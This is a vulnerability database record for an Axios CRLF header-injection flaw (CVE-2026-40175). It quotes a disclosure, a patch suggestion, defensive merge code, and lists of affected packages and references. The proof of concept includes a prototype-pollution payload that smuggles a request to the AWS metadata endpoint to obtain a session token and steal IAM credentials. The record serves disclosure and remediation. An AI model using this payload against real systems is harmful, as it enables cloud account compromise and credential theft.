Vulnerability_id VCID-ek49-tuj4-t3ap
Summary
Axios has Unrestricted Cloud Metadata Exfiltration via Header Injection Chain
# Vulnerability Disclosure: Unrestricted Cloud Metadata Exfiltration via Header Injection Chain

## Summary
The Axios library is vulnerable to a specific "Gadget" attack chain that allows **Prototype Pollution** in any third-party dependency to be escalated into **Remote Code Execution (RCE)** or **Full Cloud Compromise** (via AWS IMDSv2 bypass).

While Axios patches exist for *preventing* pollution, the library remains vulnerable to *being used* as a gadget when pollution occurs elsewhere. This is due to a lack of HTTP header sanitization (CWE-113) combined with default SSRF capabilities.

**Severity**: Critical (CVSS 9.9)
**Affected Versions**: All versions (v0.x - v1.x)
**Vulnerable Component**: `lib/adapters/http.js` (Header Processing)

## Usage of "Helper" Vulnerabilities
This vulnerability is unique because it requires **Zero Direct User Input**.
If an attacker can pollute `Object.prototype` via *any* other library in the stack (e.g., `qs`, `minimist`, `ini`, `body-parser`), Axios will automatically pick up the polluted properties during its config merge.

Because Axios does not sanitise these merged header values for CRLF (`\r\n`) characters, the polluted property becomes a **Request Smuggling** payload.

## Proof of Concept

### 1. The Setup (Simulated Pollution)
Imagine a scenario where a known vulnerability exists in a query parser. The attacker sends a payload that sets:
```javascript
Object.prototype['x-amz-target'] = "dummy\r\n\r\nPUT /latest/api/token HTTP/1.1\r\nHost: 169.254.169.254\r\nX-aws-ec2-metadata-token-ttl-seconds: 21600\r\n\r\nGET /ignore";
```

### 2. The Gadget Trigger (Safe Code)
The application makes a completely safe, hardcoded request:
```javascript
import axios from 'axios';

// This looks safe to the developer: a hardcoded URL and no caller-supplied headers
await axios.get('https://analytics.internal/pings');
```

### 3. The Execution
Axios merges the prototype property `x-amz-target` into the request headers. It then writes the header value directly to the socket without validation.

**Resulting HTTP traffic:**
```http
GET /pings HTTP/1.1
Host: analytics.internal
x-amz-target: dummy

PUT /latest/api/token HTTP/1.1
Host: 169.254.169.254
X-aws-ec2-metadata-token-ttl-seconds: 21600

GET /ignore HTTP/1.1
...
```

### 4. The Impact (IMDSv2 Bypass)
The "Smuggled" second request is a valid `PUT` request to the AWS Metadata Service. It includes the required `X-aws-ec2-metadata-token-ttl-seconds` header (which a normal SSRF cannot send).
The Metadata Service returns a session token, allowing the attacker to steal IAM credentials and compromise the cloud account.

## Impact Analysis
-   **Security Control Bypass**: Defeats AWS IMDSv2 (Session Tokens).
-   **Authentication Bypass**: Can inject headers (`Cookie`, `Authorization`) to pivot into internal administrative panels.
-   **Cache Poisoning**: Can inject `Host` headers to poison shared caches.

## Recommended Fix
Validate all header values in `lib/adapters/http.js` and `xhr.js` before passing them to the underlying request function.

**Patch Suggestion:**
```javascript
// In lib/adapters/http.js
utils.forEach(requestHeaders, function setRequestHeader(val, key) {
  if (/[\r\n]/.test(val)) {
    throw new Error('Security: Header value contains invalid characters');
  }
  // ... proceed to set header
});
```
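The following is an added example, not Axios's own code: it shows, from the defender's side, how a header merge that walks inherited properties picks up a polluted `Object.prototype` key (the step described under "The Execution"), and how a merge restricted to own keys, with the CR/LF check on names and values that the recommended fix calls for, does not. The pollution is simulated in-process with a constructed, benign value and is undone afterwards; all function names are assumptions.

```javascript
// Loose merge in the style of many config mergers: for...in also visits
// enumerable properties inherited from Object.prototype.
function mergeHeadersLoose(defaults, perRequest) {
  const out = {};
  for (const k in defaults) out[k] = defaults[k];
  for (const k in perRequest) out[k] = perRequest[k];
  return out;
}

// RFC 9110 token characters: the only characters allowed in a header name.
const HEADER_NAME_RE = /^[!#$%&'*+\-.^_`|~0-9A-Za-z]+$/;

// Reject CR/LF (CWE-113) in the value and any non-token byte in the name.
function assertSafeHeader(name, value) {
  if (!HEADER_NAME_RE.test(name)) {
    throw new Error(`invalid header name: ${JSON.stringify(name)}`);
  }
  if (/[\r\n]/.test(String(value))) {
    throw new Error(`CR/LF in header value for ${name}`);
  }
}

// Hardened merge: own enumerable keys only, written into a null-prototype
// object so nothing can be inherited, each header validated before use.
function mergeHeadersHardened(...sources) {
  const out = Object.create(null);
  for (const src of sources) {
    for (const name of Object.keys(src)) {
      assertSafeHeader(name, src[name]);
      out[name.toLowerCase()] = String(src[name]);
    }
  }
  return out;
}

// Controlled simulation of pollution arriving from elsewhere in the stack;
// the property is removed in `finally` so it never outlives this call.
function withPollutedPrototype(key, value, fn) {
  Object.defineProperty(Object.prototype, key, {
    value, enumerable: true, configurable: true, writable: true,
  });
  try { return fn(); } finally { delete Object.prototype[key]; }
}

// Constructed sample: a CR/LF-bearing value under a made-up header name.
function demo() {
  const defaults = { accept: 'application/json' };
  const perRequest = { 'x-request-id': 'abc123' };
  return withPollutedPrototype('x-polluted', 'dummy\r\nx-injected: 1', () => {
    const loose = mergeHeadersLoose(defaults, perRequest);
    const hardened = mergeHeadersHardened(defaults, perRequest);
    return {
      looseLeaked: Object.hasOwn(loose, 'x-polluted'),   // true: leaked in
      hardenedLeaked: 'x-polluted' in hardened,          // false: dropped
      hardenedKeys: Object.keys(hardened),               // own keys only
    };
  });
}
```

Note that `mergeHeadersHardened` also rejects an explicitly supplied CR/LF value or a non-token header name, so the check covers both the gadget path and direct misuse.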

## References
-   **OWASP**: CRLF Injection (CWE-113)

This report was generated as part of a security audit of the Axios library.
Aliases
0
alias CVE-2026-40175
1
alias GHSA-fvcv-3m26-pcqx
Fixed_packages
0
url pkg:deb/debian/node-axios@1.15.0-1
purl pkg:deb/debian/node-axios@1.15.0-1
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.15.0-1
1
url pkg:deb/debian/node-axios@1.15.0-1?distro=trixie
purl pkg:deb/debian/node-axios@1.15.0-1?distro=trixie
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.15.0-1%3Fdistro=trixie
2
url pkg:npm/axios@0.31.0
purl pkg:npm/axios@0.31.0
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/axios@0.31.0
3
url pkg:npm/axios@1.15.0
purl pkg:npm/axios@1.15.0
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.15.0
Affected_packages
0
url pkg:deb/debian/node-axios@0.21.1%2Bdfsg-1%2Bdeb11u1
purl pkg:deb/debian/node-axios@0.21.1%2Bdfsg-1%2Bdeb11u1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1vkx-cwua-rqe4
1
vulnerability VCID-7rdk-mw2k-eqdx
2
vulnerability VCID-aq84-8cnz-byax
3
vulnerability VCID-axk7-6q4b-vuga
4
vulnerability VCID-ek49-tuj4-t3ap
5
vulnerability VCID-hq6f-86aj-8yav
6
vulnerability VCID-kgnf-z6ca-tqgp
7
vulnerability VCID-x41s-g5mh-pkdq
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@0.21.1%252Bdfsg-1%252Bdeb11u1
1
url pkg:deb/debian/node-axios@0.21.1%2Bdfsg-1%2Bdeb11u1?distro=trixie
purl pkg:deb/debian/node-axios@0.21.1%2Bdfsg-1%2Bdeb11u1?distro=trixie
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1vkx-cwua-rqe4
1
vulnerability VCID-7rdk-mw2k-eqdx
2
vulnerability VCID-aq84-8cnz-byax
3
vulnerability VCID-axk7-6q4b-vuga
4
vulnerability VCID-ek49-tuj4-t3ap
5
vulnerability VCID-hq6f-86aj-8yav
6
vulnerability VCID-kgnf-z6ca-tqgp
7
vulnerability VCID-x41s-g5mh-pkdq
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@0.21.1%252Bdfsg-1%252Bdeb11u1%3Fdistro=trixie
2
url pkg:deb/debian/node-axios@1.2.1%2Bdfsg-1%2Bdeb12u1
purl pkg:deb/debian/node-axios@1.2.1%2Bdfsg-1%2Bdeb12u1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-aq84-8cnz-byax
1
vulnerability VCID-axk7-6q4b-vuga
2
vulnerability VCID-ek49-tuj4-t3ap
3
vulnerability VCID-hq6f-86aj-8yav
4
vulnerability VCID-kgnf-z6ca-tqgp
5
vulnerability VCID-x41s-g5mh-pkdq
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.2.1%252Bdfsg-1%252Bdeb12u1
3
url pkg:deb/debian/node-axios@1.2.1%2Bdfsg-1%2Bdeb12u1?distro=trixie
purl pkg:deb/debian/node-axios@1.2.1%2Bdfsg-1%2Bdeb12u1?distro=trixie
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-aq84-8cnz-byax
1
vulnerability VCID-axk7-6q4b-vuga
2
vulnerability VCID-ek49-tuj4-t3ap
3
vulnerability VCID-hq6f-86aj-8yav
4
vulnerability VCID-kgnf-z6ca-tqgp
5
vulnerability VCID-x41s-g5mh-pkdq
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.2.1%252Bdfsg-1%252Bdeb12u1%3Fdistro=trixie
4
url pkg:deb/debian/node-axios@1.8.4%2Bdfsg-1?distro=trixie
purl pkg:deb/debian/node-axios@1.8.4%2Bdfsg-1?distro=trixie
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-aq84-8cnz-byax
1
vulnerability VCID-axk7-6q4b-vuga
2
vulnerability VCID-ek49-tuj4-t3ap
3
vulnerability VCID-kgnf-z6ca-tqgp
4
vulnerability VCID-x41s-g5mh-pkdq
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.8.4%252Bdfsg-1%3Fdistro=trixie
5
url pkg:deb/debian/node-axios@1.8.4%2Bdfsg-1
purl pkg:deb/debian/node-axios@1.8.4%2Bdfsg-1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-aq84-8cnz-byax
1
vulnerability VCID-axk7-6q4b-vuga
2
vulnerability VCID-ek49-tuj4-t3ap
3
vulnerability VCID-kgnf-z6ca-tqgp
4
vulnerability VCID-x41s-g5mh-pkdq
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.8.4%252Bdfsg-1
6
url pkg:npm/axios@1.0.0
purl pkg:npm/axios@1.0.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-7rdk-mw2k-eqdx
1
vulnerability VCID-aq84-8cnz-byax
2
vulnerability VCID-axk7-6q4b-vuga
3
vulnerability VCID-ek49-tuj4-t3ap
4
vulnerability VCID-hq6f-86aj-8yav
5
vulnerability VCID-x41s-g5mh-pkdq
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.0.0
References
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-40175.json
reference_id
reference_type
scores
0
value 9.0
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-40175.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-40175
reference_id
reference_type
scores
0
value 0.00045
scoring_system epss
scoring_elements 0.13652
published_at 2026-04-21T12:55:00Z
1
value 0.00136
scoring_system epss
scoring_elements 0.33357
published_at 2026-04-18T12:55:00Z
2
value 0.00239
scoring_system epss
scoring_elements 0.46982
published_at 2026-04-11T12:55:00Z
3
value 0.00239
scoring_system epss
scoring_elements 0.46962
published_at 2026-04-13T12:55:00Z
4
value 0.00239
scoring_system epss
scoring_elements 0.46955
published_at 2026-04-12T12:55:00Z
5
value 0.0053
scoring_system epss
scoring_elements 0.67279
published_at 2026-04-16T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-40175
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-40175
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-40175
3
reference_url https://github.com/axios/axios
reference_id
reference_type
scores
0
value 10.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
1
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/axios/axios
4
reference_url https://github.com/axios/axios/commit/03cdfc99e8db32a390e12128208b6778492cee9c
reference_id
reference_type
scores
0
value 10.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
1
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value MODERATE
scoring_system generic_textual
scoring_elements
4
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-04-14T03:55:46Z/
url https://github.com/axios/axios/commit/03cdfc99e8db32a390e12128208b6778492cee9c
5
reference_url https://github.com/axios/axios/commit/363185461b90b1b78845dc8a99a1f103d9b122a1
reference_id
reference_type
scores
0
value 10
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
1
value 10.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
2
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
3
value CRITICAL
scoring_system generic_textual
scoring_elements
4
value MODERATE
scoring_system generic_textual
scoring_elements
5
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-04-13T16:11:45Z/
6
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-04-14T03:55:46Z/
url https://github.com/axios/axios/commit/363185461b90b1b78845dc8a99a1f103d9b122a1
6
reference_url https://github.com/axios/axios/pull/10660
reference_id
reference_type
scores
0
value 10
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
1
value 10.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
2
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
3
value CRITICAL
scoring_system generic_textual
scoring_elements
4
value MODERATE
scoring_system generic_textual
scoring_elements
5
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-04-13T16:11:45Z/
6
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-04-14T03:55:46Z/
url https://github.com/axios/axios/pull/10660
7
reference_url https://github.com/axios/axios/pull/10660#issuecomment-4224168081
reference_id
reference_type
scores
0
value 10.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
1
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/axios/axios/pull/10660#issuecomment-4224168081
8
reference_url https://github.com/axios/axios/pull/10688
reference_id
reference_type
scores
0
value 10.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
1
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value MODERATE
scoring_system generic_textual
scoring_elements
4
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-04-14T03:55:46Z/
url https://github.com/axios/axios/pull/10688
9
reference_url https://github.com/axios/axios/releases/tag/v0.31.0
reference_id
reference_type
scores
0
value 10.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
1
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value MODERATE
scoring_system generic_textual
scoring_elements
4
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-04-14T03:55:46Z/
url https://github.com/axios/axios/releases/tag/v0.31.0
10
reference_url https://github.com/axios/axios/releases/tag/v1.15.0
reference_id
reference_type
scores
0
value 10
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
1
value 10.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
2
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
3
value CRITICAL
scoring_system generic_textual
scoring_elements
4
value MODERATE
scoring_system generic_textual
scoring_elements
5
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-04-13T16:11:45Z/
6
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-04-14T03:55:46Z/
url https://github.com/axios/axios/releases/tag/v1.15.0
11
reference_url https://github.com/axios/axios/security/advisories/GHSA-fvcv-3m26-pcqx
reference_id
reference_type
scores
0
value 10
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
1
value 10.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
2
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
3
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
4
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
5
value CRITICAL
scoring_system generic_textual
scoring_elements
6
value MODERATE
scoring_system generic_textual
scoring_elements
7
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-04-13T16:11:45Z/
8
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-04-14T03:55:46Z/
url https://github.com/axios/axios/security/advisories/GHSA-fvcv-3m26-pcqx
12
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-40175
reference_id
reference_type
scores
0
value 10.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
1
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-40175
13
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2457432
reference_id 2457432
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2457432
14
reference_url https://github.com/advisories/GHSA-fvcv-3m26-pcqx
reference_id GHSA-fvcv-3m26-pcqx
reference_type
scores
0
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-fvcv-3m26-pcqx
15
reference_url https://access.redhat.com/errata/RHSA-2026:8483
reference_id RHSA-2026:8483
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:8483
16
reference_url https://access.redhat.com/errata/RHSA-2026:8484
reference_id RHSA-2026:8484
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:8484
17
reference_url https://access.redhat.com/errata/RHSA-2026:8490
reference_id RHSA-2026:8490
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:8490
18
reference_url https://access.redhat.com/errata/RHSA-2026:8491
reference_id RHSA-2026:8491
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:8491
19
reference_url https://access.redhat.com/errata/RHSA-2026:8493
reference_id RHSA-2026:8493
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:8493
20
reference_url https://access.redhat.com/errata/RHSA-2026:8499
reference_id RHSA-2026:8499
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:8499
21
reference_url https://access.redhat.com/errata/RHSA-2026:8500
reference_id RHSA-2026:8500
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:8500
22
reference_url https://access.redhat.com/errata/RHSA-2026:8501
reference_id RHSA-2026:8501
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:8501
Weaknesses
0
cwe_id 113
name Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Request/Response Splitting')
description The product receives data from an HTTP agent/component (e.g., web server, proxy, browser, etc.), but it does not neutralize or incorrectly neutralizes CR and LF characters before the data is included in outgoing HTTP headers.
1
cwe_id 444
name Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')
description The product acts as an intermediary HTTP agent (such as a proxy or firewall) in the data flow between two entities such as a client and server, but it does not interpret malformed HTTP requests or responses in ways that are consistent with how the messages will be processed by those entities that are at the ultimate destination.
2
cwe_id 918
name Server-Side Request Forgery (SSRF)
description The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination.
3
cwe_id 915
name Improperly Controlled Modification of Dynamically-Determined Object Attributes
description The product receives input from an upstream component that specifies multiple attributes, properties, or fields that are to be initialized or updated in an object, but it does not properly control which attributes can be modified.
Exploits
Severity_range_score 4.0 - 10.0
Exploitability 0.5
Weighted_severity 9.0
Risk_score 4.5
Resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-ek49-tuj4-t3ap